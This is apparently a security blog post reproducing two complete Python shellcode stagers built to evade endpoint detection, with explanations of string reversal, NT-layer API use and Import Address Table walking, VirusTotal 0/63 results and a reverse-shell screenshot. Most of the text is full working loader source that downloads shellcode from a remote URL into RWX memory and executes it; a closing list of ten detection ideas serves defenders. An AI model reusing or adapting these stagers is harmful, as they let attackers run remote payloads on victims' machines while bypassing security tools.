FUD Shellcode Stagers in Python: String Reversal, NT APIs and IAT Walking to Bypass EDR

FUD Shellcode Stagers in Python: String Reversal, NT APIs and IAT Walking to Bypass EDR

Original text: “Creative approaches to coding FUD Stagers”R.B.C. (g3tsyst3m), G3tSyst3m’s Infosec Blog (March 29, 2026). The code, screenshots and VirusTotal results below are reproduced verbatim with attribution captions; the surrounding prose is a paraphrase.

Executive Summary

The g3tsyst3m blog post walks through two Python-based shellcode stagers that both achieve 0/63 on VirusTotal by attacking the weakest point in modern endpoint defence: static analysis. Variant 1 is a 135-line dropper that downloads a remote payload, reverses suspicious API strings (NtAllocateVirtualMemory, NtCreateThreadEx, memmove) so they never appear as plaintext tokens, allocates RWX memory through the NT-layer instead of kernel32, and spawns a thread to detonate the shellcode — no disk writes, no PE loader involvement, no obviously malicious imports. Variant 2 raises the bar: it skips VirtualAlloc entirely as a named symbol and instead parses the on-disk copy of pythonXY.dll with pefile, walks the Import Address Table looking for the reversed needle collAlautriV, computes the runtime IAT slot from base + RVA − ImageBase, dereferences it to read the live VirtualAlloc pointer the Windows loader wrote there at startup, and casts that pointer to a callable through ctypes.WINFUNCTYPE.

For defenders the takeaway is not the obfuscation tricks themselves — reversed strings unwind in a sandbox in milliseconds — it is the choice of carrier. Python interpreters are an unusual but rarely-monitored execution surface: legitimate Python rarely allocates RWX, rarely calls NtCreateThreadEx, and never walks the IAT of its own runtime DLL. The article ends with ten dynamic-analysis detection ideas that operate at exactly those behavioural seams — from ETW Microsoft-Windows-Threat-Intelligence ALLOCVM events out of interpreter processes, to memory scanning of execute-only pages after the decode happens. This post reproduces both stagers in full and unpacks each evasion mechanism phase by phase.

Why script interpreters as a carrier

There is no silver bullet for EDR bypass — the author opens with that observation, and with ML-assisted scoring now wired into most modern endpoint products the surface keeps shifting. What does work, repeatedly, is picking a host process that the defender’s telemetry treats as benign. Script interpreters — Python, Ruby, Perl, even PHP — sit in that sweet spot: they execute arbitrary user code but their on-disk artifacts (a .py file, a portable python.exe) are scrutinised far less aggressively than a compiled PE. PowerShell occupies the opposite extreme; threat actors have abused it so thoroughly that staying FUD inside powershell.exe is “incredibly difficult—but certainly not impossible.”

FUD Stager Variant #1

High-level overview

  1. Build the staging URL by reversing a string (SCODE_U[::-1]) so the destination never appears in cleartext.
  2. Download the raw shellcode bytes into memory over HTTPS.
  3. Allocate RWX memory through NtAllocateVirtualMemory — the NT-layer call, not the kernel32 wrapper — to slip past API hooks that monitor only the upper layer.
  4. Copy the bytes in with memmove.
  5. Detonate via NtCreateThreadEx with the new region as the start address.
  6. Every suspicious API name (_api, _api2, …) is stored reversed and resolved with getattr(ntdll, name[::-1]) at runtime.

The net effect is a 135-line in-memory dropper that never touches disk after the initial .py.

Part 1 — Bypassing static analysis

The first defensive layer to climb is not a behavioural sensor — it is the static scoring model. Two tricks do most of the work: rename or shorten any obvious offsec term (shellcodescode, download_shellcodedwnlod_scode), and store every flagged API name reversed so it gets unwound at runtime.

Two illustrative reversals:

_api    = "yromeMlautriVetacollAtN"   # NtAllocateVirtualMemory reversed
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"

Why string detection matters

Whether the engine is signature-based or model-based, almost every static layer ends up doing some form of token scoring. Strings like VirtualAlloc, CreateThread, NtAllocateVirtualMemory, and shellcode carry heavy malicious weight in any pretrained classifier. The goal is not invisibility but threshold management: stay under the score that triggers a block or a quarantine. Reversing the API strings and resolving them at runtime is, as the author puts it, “about as low-effort as obfuscation gets” — and it works precisely because a static engine, by definition, cannot execute your code to unwind the reversal.

Variable names matter

Equally simple, equally effective: rename your variables, functions and even comments away from the giveaway tokens. download_shellcode is a gift to any analyst or scanner; dwnlod_scode won’t fool a human for long, but human reviewers are not the audience — the pre-execution scoring pass is. The point is to nudge the file’s aggregate token score below the disposition threshold.

Part 2 — Downloading the shellcode into memory

The shellcode lives in a public Github repo. The URL is stored reversed (SCODE_U) and unwound at runtime. To keep the hosted file itself off the obvious-extension radar, the author renames it to .dyno — an extension Windows does not associate with anything, which receives less scrutiny than .bin would.

SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
    try:
        response = requests.get(url, stream=True)  # Stream for large files
        response.raise_for_status()
        shel_ly = b''.join(response.iter_content(chunk_size=4096))  # Load fully into bytes
        print(f"[+] Dwnlded {len(shel_ly)} bytes of scode")
        return shel_ly
    except Exception as e:
        print(f"[-] Dwnld failed: {e}")
        return None

The function streams the response and returns the raw bytes as shel_ly. No open(), no write(), no on-disk artifact — the payload lives only as a Python bytes object until execution.

Part 3 — Eggsecuting shellcode in memory 🥚

The author keeps the execution path deliberately plain — no direct syscalls, no advanced injection trick — just to see how far minimal obfuscation alone can carry the sample. The single concession to evasion is using the NT layer instead of the kernel32 wrappers, which lifts the calls above a common ring of user-mode hooks.

Obfuscated Windows API calls

"eldnaHesolC"[::-1]              -> CloseHandle
"tcejbOelgniSroFtiaW"[::-1]      -> WaitForSingleObject
"yromeMlautriVetacollAtN"[::-1]  -> NtAllocateVirtualMemory
"xEdaerhTetaerCtN"[::-1]         -> NtCreateThreadEx
"evommem"[::-1]                  -> memmove

Allocating executable memory through the NT API

NtAllocateVirtualMemory (the lower-level cousin of VirtualAlloc exported from ntdll) requests a region in the current process with the classic offensive triple: MEM_COMMIT | MEM_RESERVE for the allocation type and PAGE_EXECUTE_READWRITE for the protection. Textbook RWX.

Copy and execute

memmove (also resolved by string reversal) blits the downloaded bytes into the freshly allocated RWX region. Then NtCreateThreadEx spawns a thread inside the current process with the start address pointed at the beginning of the shellcode. WaitForSingleObject blocks for up to ten seconds for the thread to finish, then CloseHandle tidies up.

def eggsecute_scode(scode2):
    # Constants
    MEM_COMMIT = 0x1000
    MEM_RESERVE = 0x2000
    PAGE_EXECUTE_READWRITE = 0x40

    kernel32 = ctypes.windll.kernel32
    ntdll = ctypes.windll.ntdll

    _api4 = "eldnaHesolC"
    closingtime = getattr(kernel32, _api4[::-1])

    closingtime.restype = wintypes.DWORD
    closingtime.argtypes = [
    wintypes.HANDLE,  # hHandle
    ]

    _api3 = "tcejbOelgniSroFtiaW"
    waitinaround = getattr(kernel32, _api3[::-1])

    waitinaround.restype = wintypes.DWORD
    waitinaround.argtypes = [
    wintypes.HANDLE,  # hHandle
    wintypes.DWORD,   # dwMilliseconds
    ]

    _api = "yromeMlautriVetacollAtN"  #
    Allocator = getattr(ntdll, _api[::-1])

    Allocator.restype = wintypes.BOOL
    Allocator.argtypes = [
    wintypes.HANDLE,
    ctypes.POINTER(wintypes.LPVOID),
    ctypes.c_void_p,
    ctypes.POINTER(ctypes.c_size_t),
    wintypes.DWORD,
    wintypes.DWORD,
    ]

    _api2 = "xEdaerhTetaerCtN"
    thred_the_needle = getattr(ntdll, _api2[::-1])

    thred_the_needle.restype = wintypes.LONG  # NTSTATUS
    thred_the_needle.argtypes = [
    ctypes.POINTER(wintypes.HANDLE),   # ThredHandel (out)
    ctypes.c_ulong,                    # DesiredAccess
    ctypes.c_void_p,                   # ObjectAttributes
    wintypes.HANDLE,                   # ProcessHandle
    ctypes.c_void_p,                   # StartRoutine (your scode addr)
    ctypes.c_void_p,                   # Argument
    ctypes.c_ulong,                    # CrateFlags (0 = run immediately)
    ctypes.c_size_t,                   # ZeroBits
    ctypes.c_size_t,                   # StackSize
    ctypes.c_size_t,                   # MaximumStackSize
    ctypes.c_void_p,                   # AttributeList
]

    addr = wintypes.LPVOID(0)
    size = ctypes.c_size_t(len(scode2))
    current_process = wintypes.HANDLE(-1)
    status = Allocator(
        current_process,
        ctypes.byref(addr),
        0,
        ctypes.byref(size),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE
    )

    if status == 0:  # NTSTATUS 0 = success
        mem_addr = addr.value
        print(f"[+] Allcted mem at: 0x{mem_addr:x}")

        _api0 = "evommem"
        m3mMov3r = getattr(ctypes, _api0[::-1])

        m3mMov3r(mem_addr, scode2, len(scode2))
        print("[+] Scode copied to memory")

        h_thread = wintypes.HANDLE(0)
        status2 = thred_the_needle(
        ctypes.byref(h_thread),
        0x1FFFFF,                          # THRED_ALL_ACCESS
        None,
        current_process,
        ctypes.cast(mem_addr, ctypes.c_void_p),  # scode start address
        None,
        0,                                 # no flags, start immediately
        0,
        0,
        0,
        None
        )

        if status2 == 0:
            print(f"[+] Thredded Needle!")

            waitinaround(h_thread.value, 10000)
            closingtime(h_thread.value)
        else:
            print(f"[-] thred_the_needle failed: {hex(status2 & 0xFFFFFFFF)}")

    else:
        print(f"[-] Allocator failed (NTSTATUS: 0x{status:08X})")

Bringing it all together

One hundred and thirty-five lines of Python, and an effective in-memory shellcode runner with no disk write. At submission time the sample scored 0/63 on VirusTotal — FUD achieved.

Terminal output showing the Python stager downloading shellcode, allocating RWX memory, copying bytes, and creating a thread
Variant #1 console output: download → NtAllocateVirtualMemory → memmove → NtCreateThreadEx. Source: original article.
Attacker handler receiving a reverse shell from the Variant 1 stager
Reverse shell received after the Variant #1 stager finishes detonating in-memory. Source: original article.
VirusTotal scan results for Variant 1 showing zero detections out of sixty-three engines
VirusTotal verdict for Variant #1: 0/63. Source: original article.

Full source — Variant #1

#27e51de6e6a555bc622a3769ee030bfd92079022780ca8bb33958479562dfc6e

import requests
import ctypes
from ctypes import wintypes

SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
    try:
        response = requests.get(url, stream=True)  # Stream for large files
        response.raise_for_status()
        shel_ly = b''.join(response.iter_content(chunk_size=4096))  # Load fully into bytes
        print(f"[+] Dwnlded {len(shel_ly)} bytes of scode")
        print(shel_ly)
        return shel_ly
    except Exception as e:
        print(f"[-] Dwnld failed: {e}")
        return None

def eggsecute_scode(scode2):
    # Constants
    MEM_COMMIT = 0x1000
    MEM_RESERVE = 0x2000
    PAGE_EXECUTE_READWRITE = 0x40

    kernel32 = ctypes.windll.kernel32
    ntdll = ctypes.windll.ntdll

    _api4 = "eldnaHesolC"
    closingtime = getattr(kernel32, _api4[::-1])

    closingtime.restype = wintypes.DWORD
    closingtime.argtypes = [
    wintypes.HANDLE,  # hHandle
    ]

    _api3 = "tcejbOelgniSroFtiaW"
    waitinaround = getattr(kernel32, _api3[::-1])

    waitinaround.restype = wintypes.DWORD
    waitinaround.argtypes = [
    wintypes.HANDLE,  # hHandle
    wintypes.DWORD,   # dwMilliseconds
    ]

    _api = "yromeMlautriVetacollAtN"  #
    Allocator = getattr(ntdll, _api[::-1])

    Allocator.restype = wintypes.BOOL
    Allocator.argtypes = [
    wintypes.HANDLE,
    ctypes.POINTER(wintypes.LPVOID),
    ctypes.c_void_p,
    ctypes.POINTER(ctypes.c_size_t),
    wintypes.DWORD,
    wintypes.DWORD,
    ]

    _api2 = "xEdaerhTetaerCtN"
    thred_the_needle = getattr(ntdll, _api2[::-1])

    thred_the_needle.restype = wintypes.LONG  # NTSTATUS
    thred_the_needle.argtypes = [
    ctypes.POINTER(wintypes.HANDLE),   # ThredHandel (out)
    ctypes.c_ulong,                    # DesiredAccess
    ctypes.c_void_p,                   # ObjectAttributes
    wintypes.HANDLE,                   # ProcessHandle
    ctypes.c_void_p,                   # StartRoutine (your scode addr)
    ctypes.c_void_p,                   # Argument
    ctypes.c_ulong,                    # CrateFlags (0 = run immediately)
    ctypes.c_size_t,                   # ZeroBits
    ctypes.c_size_t,                   # StackSize
    ctypes.c_size_t,                   # MaximumStackSize
    ctypes.c_void_p,                   # AttributeList
]

    addr = wintypes.LPVOID(0)
    size = ctypes.c_size_t(len(scode2))
    current_process = wintypes.HANDLE(-1)
    status = Allocator(
        current_process,
        ctypes.byref(addr),
        0,
        ctypes.byref(size),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE
    )

    if status == 0:  # NTSTATUS 0 = success
        mem_addr = addr.value
        print(f"[+] Allcted mem at: 0x{mem_addr:x}")

        _api0 = "evommem"
        m3mMov3r = getattr(ctypes, _api0[::-1])

        m3mMov3r(mem_addr, scode2, len(scode2))
        print("[+] Scode copied to memory")

        h_thread = wintypes.HANDLE(0)
        status2 = thred_the_needle(
        ctypes.byref(h_thread),
        0x1FFFFF,                          # THRED_ALL_ACCESS
        None,
        current_process,
        ctypes.cast(mem_addr, ctypes.c_void_p),  # scode start address
        None,
        0,                                 # no flags, start immediately
        0,
        0,
        0,
        None
        )

        if status2 == 0:
            print(f"[+] Thredded Needle!")

            waitinaround(h_thread.value, 10000)
            closingtime(h_thread.value)
        else:
            print(f"[-] thred_the_needle failed: {hex(status2 & 0xFFFFFFFF)}")

    else:
        print(f"[-] Allocator failed (NTSTATUS: 0x{status:08X})")

if __name__ == "__main__":
    print("[*] Dwnlding scode from URL...")
    scode = dwnlod_scode(SCODE_U)
    if scode:
        print("[*] Eggsecuting Scode in mem...")
        eggsecute_scode(scode)
    else:
        print("[-] Aborting.")

FUD Stager Variant #2

High-level overview

Variant #2 removes VirtualAlloc from the static surface entirely. Instead of looking the symbol up (via GetProcAddress or even via reversed-string indirection through ctypes), it borrows what the Python interpreter has already loaded: the kernel32 import resolved into pythonXY.dll’s IAT. The runtime address of VirtualAlloc is sitting in memory the moment Python is running — you just have to walk to it. The assumption is a portable Python (so the on-disk pythonXY.dll is available for PE parsing).

The resolved IAT pointer becomes a typed function pointer (ctypes.WINFUNCTYPE), giving the stager direct callable access to VirtualAlloc without ever naming the symbol explicitly. No direct API call. No obvious import. No GetProcAddress. Static analysis loses another anchor.

Variant 2 stager output showing python314.dll base address, IAT-resolved VirtualAlloc pointer, and RWX page allocation
Variant #2 preview: python314.dll base address, IAT-resolved VirtualAlloc pointer, RWX page allocated. Source: original article.
Variant 2 stager copying shellcode into the RWX page and invoking the cast function pointer to execute it
Variant #2 preview: copy_to_page copies the downloaded bytes and exec_page invokes the cast function pointer. Source: original article.

Part 1 — The familiar downloader

The opening is intentionally identical to Variant #1 — the URL is stored reversed, the variable is renamed to SCODE_U, the download path drops the bytes into a Python bytes object. New here is the conditional pefile import.

import ctypes, sys, os
import requests

try:
    import pefile
except ImportError:
    print("pip install pefile"); sys.exit(1)

SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]

def dwnlod_scode(url):
    try:
        response = requests.get(url, stream=True)
        response.raise_for_status()
        shel_ly = b''.join(response.iter_content(chunk_size=4096))
        print(f"[+] Downloaded {len(shel_ly)} bytes")
        return shel_ly
    except Exception as e:
        print(f"[-] Download failed: {e}"); return None

Part 2 — Copy/exec helpers

Two short helpers: copy_to_page uses ctypes.memmove to blit the shellcode into the RWX region, and exec_page casts that page address to a void(*)(void) through ctypes.WINFUNCTYPE(None) and calls it. Note ctypes accepts a Python bytes object directly as the src argument to memmove, which keeps the call site clean.

def copy_to_page(page: int, scode: bytes) -> bool:
    """Copy scode bytes into the RWX page via ctypes.memmove."""
    if not page:
        print("[-] Invalid page address"); return False
    if len(scode) > 0x1000:
        print(f"[-] Scode too large ({len(scode)} > 0x1000)"); return False

    # memmove(dst, src, count)
    # dst = raw integer address of our RWX page
    # src = scode bytes (ctypes accepts bytes directly as src)
    ctypes.memmove(page, scode, len(scode))
    print(f"[+] Copied {len(scode)} bytes → 0x{page:016x}")
    return True

def exec_page(page: int):
    """Cast the page to a void(*)(void) and call it."""
    thunk = ctypes.WINFUNCTYPE(None)(page)
    print(f"[+] Executing scode @ 0x{page:016x}")
    thunk()

Part 3 — Walking the IAT to locate VirtualAlloc

Phase 1 — build the DLL name and path dynamically

Compose pythonXY.dll from sys.version_info at runtime — python313.dll, python314.dll, whatever the interpreter happens to be. The on-disk dll_path is what pefile will read to parse section headers, the import directory, and ImageBase. The same code works across every Python minor release with no edits.

ver      = sys.version_info
dll_name = f"python{ver.major}{ver.minor}.dll"
dll_path = os.path.join(os.path.dirname(sys.executable), dll_name)

Phase 2 — live in-memory base address

GetModuleHandleW returns the base address of the already-loaded module — no new mapping, no disk read. Python is running, so pythonXY.dll is resident. The explicit restype = c_void_p is important: without it ctypes would truncate the 64-bit address to a signed 32-bit int.

k32 = ctypes.windll.kernel32
k32.GetModuleHandleW.restype  = ctypes.c_void_p
k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
base = k32.GetModuleHandleW(dll_name)

Phase 3 — parse the on-disk PE

Read the same DLL from disk just for its layout — section headers, import directory offsets, ImageBase. fast_load=False together with the explicit parse_data_directories() ensures the full import table is materialised.

pe = pefile.PE(dll_path, fast_load=False)
pe.parse_data_directories()

Phase 4 — walk the IAT, resolve the live pointer

Filter to kernel32.dll imports only and match against b"VirtualAlloc" — which never appears in plaintext because the bytestring b"collAlautriV" is reversed at compare time. For the match, imp.address is the on-disk VA of the IAT slot; subtracting pe.OPTIONAL_HEADER.ImageBase converts it to an RVA; adding the live base converts the RVA into the actual runtime address of the slot. c_uint64.from_address(slot).value dereferences the eight-byte pointer the Windows loader wrote there at startup. The result va_va is the live, post-ASLR, post-loader-resolution runtime address of VirtualAlloc, ready to be cast to a callable.

memprep = b"collAlautriV"   # "VirtualAlloc" reversed
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    if b'kernel32' in entry.dll.lower():
        for imp in entry.imports:
            if imp.name == memprep[::-1]:
                slot  = base + imp.address - pe.OPTIONAL_HEADER.ImageBase
                va_va = ctypes.c_uint64.from_address(slot).value

Part 4 — cast and execute

ctypes.WINFUNCTYPE turns the raw va_va integer into a typed callable whose signature mirrors VirtualAlloc: returns void*, takes void*, SIZE_T, DWORD, DWORD. Calling it with NULL, 0x1000, MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40) returns a fresh RWX page — without a single direct reference to the function name anywhere in the binary text.

MemoryAllocator = ctypes.WINFUNCTYPE(
    ctypes.c_void_p,
    ctypes.c_void_p, ctypes.c_size_t,
    ctypes.c_uint32, ctypes.c_uint32
)(va_va) # <--here's where we cast it

page = MemoryAllocator(None, 0x1000, 0x3000, 0x40)
print(f"[+] RWX page @ 0x{page:016x}" if page else f"[-] failed (GLE={k32.GetLastError()})")

if page:
    print("[+] allocated!")

Then the familiar finale: download the shellcode, copy it into the page, jump to it. The cleanup block (VirtualFree with MEM_RELEASE = 0x8000) only runs if the shellcode returns — which most reverse-shell payloads don’t.

# ── execution ─────────────────────────────────────────────────────────────────────
scode = dwnlod_scode(SCODE_U)
if scode:
    # page = your VAlloc result from earlier
    if copy_to_page(page, scode):
        exec_page(page)

    # ── cleanup (only reached if shellcode returns) ───────────────────────────────
    k32.VirtualFree(ctypes.c_void_p(page), 0, 0x8000)
    print("[*] freed")

VirusTotal results 💊

Hash: 6c2a91f23724a8605312bff1d629f92a7a88e78d947e79da5e403338f4eefeb6

VirusTotal scan results for Variant 2 showing zero detections out of sixty-three engines
VirusTotal verdict for Variant #2: 0/63. Source: original article.

Full source — Variant #2

#6c2a91f23724a8605312bff1d629f92a7a88e78d947e79da5e403338f4eefeb6

import ctypes, sys, os
import requests

try:
    import pefile
except ImportError:
    print("pip install pefile"); sys.exit(1)

SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]

def dwnlod_scode(url):
    try:
        response = requests.get(url, stream=True)
        response.raise_for_status()
        shel_ly = b''.join(response.iter_content(chunk_size=4096))
        print(f"[+] Downloaded {len(shel_ly)} bytes")
        return shel_ly
    except Exception as e:
        print(f"[-] Download failed: {e}"); return None

def copy_to_page(page: int, scode: bytes) -> bool:
    """Copy scode bytes into the RWX page via ctypes.memmove."""
    if not page:
        print("[-] Invalid page address"); return False
    if len(scode) > 0x1000:
        print(f"[-] Scode too large ({len(scode)} > 0x1000)"); return False

    # memmove(dst, src, count)
    # dst = raw integer address of our RWX page
    # src = scode bytes (ctypes accepts bytes directly as src)
    ctypes.memmove(page, scode, len(scode))
    print(f"[+] Copied {len(scode)} bytes → 0x{page:016x}")
    return True

def exec_page(page: int):
    """Cast the page to a void(*)(void) and call it."""
    thunk = ctypes.WINFUNCTYPE(None)(page)
    print(f"[+] Executing scode @ 0x{page:016x}")
    thunk()

ver      = sys.version_info
dll_name = f"python{ver.major}{ver.minor}.dll"
dll_path = os.path.join(os.path.dirname(sys.executable), dll_name)

k32 = ctypes.windll.kernel32
k32.GetModuleHandleW.restype  = ctypes.c_void_p
k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
base = k32.GetModuleHandleW(dll_name)
print(f"[*] {dll_name} @ 0x{base:016x}")

pe = pefile.PE(dll_path, fast_load=False)
pe.parse_data_directories()

memprep=b"collAlautriV"
va_va = 0
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    if b'kernel32' in entry.dll.lower():
        for imp in entry.imports:
            if imp.name == memprep[::-1]:
                slot  = base + imp.address - pe.OPTIONAL_HEADER.ImageBase
                va_va = ctypes.c_uint64.from_address(slot).value
                break

if not va_va:
    print("[-] collAlautriV not found in IAT"); sys.exit(1)
print(f"[+] collAlautriV @ 0x{va_va:016x}")

MemoryAllocator = ctypes.WINFUNCTYPE(
    ctypes.c_void_p,
    ctypes.c_void_p, ctypes.c_size_t,
    ctypes.c_uint32, ctypes.c_uint32
)(va_va)

page = MemoryAllocator(None, 0x1000, 0x3000, 0x40)
print(f"[+] RWX page @ 0x{page:016x}" if page else f"[-] failed (GLE={k32.GetLastError()})")

if page:
    print("[+] allocated!")

# ── execution ─────────────────────────────────────────────────────────────────────
scode = dwnlod_scode(SCODE_U)
if scode:
    # page = your VAlloc result from earlier
    if copy_to_page(page, scode):
        exec_page(page)

    # ── cleanup (only reached if shellcode returns) ───────────────────────────────
    k32.VirtualFree(ctypes.c_void_p(page), 0, 0x8000)
    print("[*] freed")

Key Takeaways

  • String reversal beats token scoring. "yromeMlautriVetacollAtN"[::-1] is a one-line trick that erases the most heavily-weighted feature from a static classifier’s view. Same logic for variable names.
  • Carrier choice matters more than the obfuscation. A Python interpreter is an unusual but legitimate process; a malicious PE is not. Both stagers achieve 0/63 on VirusTotal largely because the file under analysis is a .py, not an EXE.
  • NT-layer APIs slip past common user-mode hooks. Most hooking products instrument the kernel32 wrappers and miss the ntdll entry points. Free evasion with no opsec cost on the static side.
  • IAT walking removes the symbol from the surface entirely. If the host process has already loaded the function you want, the loader has already written its live address into the IAT — you just have to parse the PE, locate the slot, and dereference. No GetProcAddress, no import you control.
  • RWX in one shot is still legal in Win32. No VirtualProtect two-step needed; both stagers allocate executable-and-writable straight from the allocator. That’s a strong behavioural signal — cheap to detect dynamically, invisible statically.
  • 0/63 is a static metric, not a behavioural one. The author is explicit that dynamic detection of these stagers is straightforward; the entire technique lives in the pre-execution window.

Defensive Recommendations

The original article closes with ten dynamic-detection ideas. Restated here in deployment-friendly form:

  1. Alert on RWX allocations originating from python.exe (and other interpreter binaries). Legitimate Python workloads almost never request PAGE_EXECUTE_READWRITE.
  2. Consume the ETW Microsoft-Windows-Threat-Intelligence provider and alert on ALLOCVM events with execute permissions emitted by interpreter processes.
  3. Detect execution out of private, non-image-backed memory regions. Anything calling code from a private commit that isn’t mapped from a PE on disk is high signal.
  4. Correlate outbound network → allocation → execution within one process lifetime. The temporal chain is the giveaway, not any single event.
  5. Track python-requests User-Agent strings — especially talking to anonymous file hosts or raw-file CDNs.
  6. Flag NtAllocateVirtualMemory / NtCreateThreadEx originating from Python interpreters. Direct NT-layer use from a script interpreter is anomalous on its own.
  7. Sandbox-detonate unknown .py files with full API call tracing. Reversed strings unwind into plaintext in dynamic traces — what disappears statically is plainly visible at runtime.
  8. Alert on python.exe with no console / GUI parent making outbound connections. The execution context shape (orphan interpreter, network egress) is detectable.
  9. Detect pefile import activity at runtime. A running Python process parsing a PE is unusual outside of explicit RE / dev tooling.
  10. Scan execute-permission private regions periodically. Shellcode signatures that evade static scanning are often trivially detectable in-memory after decoding.

Conclusion

The g3tsyst3m post is a useful reminder that FUD is not a property of a payload — it is a property of a static analysis pipeline at a moment in time. Both stagers will eventually be detected as classifiers retrain on this exact pattern (string reversal of NT-layer API names is a strong signal once the model knows to look for it). What makes the post valuable is the mechanical clarity of the IAT-walking trick in Variant #2: it shows how much of the static surface vanishes when you treat the host process’s loader as your symbol-resolution oracle. For defenders the same clarity points exactly where to instrument — behavioural detection of RWX-from-interpreter, NT-API-from-interpreter, and private-region execution catches both variants regardless of how the strings are spelt on disk.

Original text: “Creative approaches to coding FUD Stagers” by R.B.C. (g3tsyst3m) at G3tSyst3m’s Infosec Blog.

Comments are closed.